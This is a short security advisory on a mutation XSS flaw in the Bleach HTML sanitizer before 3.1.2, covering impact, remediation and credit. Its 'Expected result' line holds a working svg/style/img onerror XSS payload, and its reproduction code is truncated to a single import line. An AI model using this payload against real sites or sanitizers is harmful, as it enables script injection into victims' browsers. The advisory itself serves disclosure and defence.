Summary
Mutation XSS (mXSS) vulnerability in Mozilla-bleach , when RCDATA and either svg or math tags are whitelisted and the keyword argument strip=False. It happens due to improper sanitization of the RCDATA tags (script, noscript, style, noframes, xmp, noembed and iframe) when placed under svg or math, allowing the browser to execute arbitrary HTML in RCDATA on the victim’s browser.
Product
Bleach before 3.1.2
Impact
According to GitHub, more than 72,000 repositories are dependent on Bleach. Among them are major vendors, including multiple Fortune 500 tech companies.
Steps to reproduce
1 | import bleach |
Expected result:
<svg><style><img src=x onerror=alert(1)></style></svg>
Remediation
Update bleach dependency to 3.1.2 and above
Credit
This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.